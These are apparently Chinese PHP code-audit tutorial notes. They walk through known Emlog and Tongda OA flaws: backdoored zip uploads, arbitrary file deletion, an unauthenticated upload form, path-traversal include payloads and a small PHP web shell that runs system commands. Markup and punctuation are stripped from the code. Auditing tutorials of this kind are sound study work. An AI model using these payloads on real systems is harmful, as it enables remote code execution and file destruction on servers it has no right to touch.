
知识点1、PHP审计-原生态开发-文件安全上传删除2、PHP审计-原生态开发-文件安全包含读取3、PHP审计-原生态开发-代码解密文件监控文件安全挖掘点:1、脚本文件名2、应用功能点3、操作关键字 文件上传文件下载(读取)文件包含文件删除等一、演示案例-PHP审计-原生开发-文件上传文件删除-Emlog文件上传-CNVD-2023-74536https://www.cnvd.org.cn/flaw/show/CNVD-2023-74536搜索函数关键字或应用关键字流程搜安装或上传等-template.php-upload_zip-emUnZip 流程搜$_FILES-template.php-upload_zip-emUnZip1、压缩默认模版目录2、压缩一个带后门模版3、上传带后门模版压缩包文件上传-CNVD-2023-74535https://www.cnvd.org.cn/flaw/show/CNVD-2023-74535流程搜$_FILES-plugin.php-upload_zip-emUnZip 流程搜安装或上传等-plugin.php-upload_zip-emUnZip1、压缩默认插件目录2、压缩一个带后门插件3、上传带后门插件压缩包文件删除-CNVD-2021-41633https://www.cnvd.org.cn/flaw/show/CNVD-2021-41633流程搜unlink-data.php-actiondell_all_bak-bak[]poc URL/admin/data.php?actiondell_all_bak POSTbak[1]1.txt二、演示案例-PHP审计-原生开发-文件上传文件包含-通达OA安装源码加密问题观察加密特征网上找资料文件上传流程找文件名-绕验证P-DEST_UID,UPLOAD_MOD-构ATTACHMENT 文件上传(文件名称)/webroot/ispirit/im/upload.php1、设置P参数不为02、设置DEST_UID参数为13、设置UPLOAD_MODE参数为1,2,34、设置上传文件参数名为ATTACHMENThtmlbodyformactionhttp://127.0.0.1/ispirit/im/upload.phpmethodpostenctypemultipart/form-datainputtypetextnamePvalue1/inputinputtypetextnameUPLOAD_MODEvalue1/inputinputtypetextnameDEST_UIDvalue1/inputinputtypefilenameATTACHMENT/inputinputtypesubmit/input/body/html但是有个问题就是上传的文件到哪去了这里就需要用到文件监控。文件监控file-jiankong.py监控上传的文件到什么地方文件包含流程搜include_once-gateway.php-$url-$key-$json文件包含(include_once)/ispirit/interface/gateway.phppoc1: /ispirit/interface/gateway.php?json{}url/general/../../attach/im/2310/1600449966.1.txt poc2: /ispirit/interface/gateway.php?json{}url/ispirit/../../attach/im/2310/1600449966.1.txt poc3: /ispirit/interface/gateway.php?json{}url/module/../../attach/im/2310/1600449966.1.txt?php$command$_POST[cmd];$wshnew COM(WScript.shell);$exec$wsh-exec(cmd /c .$command);$stdout$exec-StdOut();$stroutput$stdout-ReadAll();echo$stroutput;?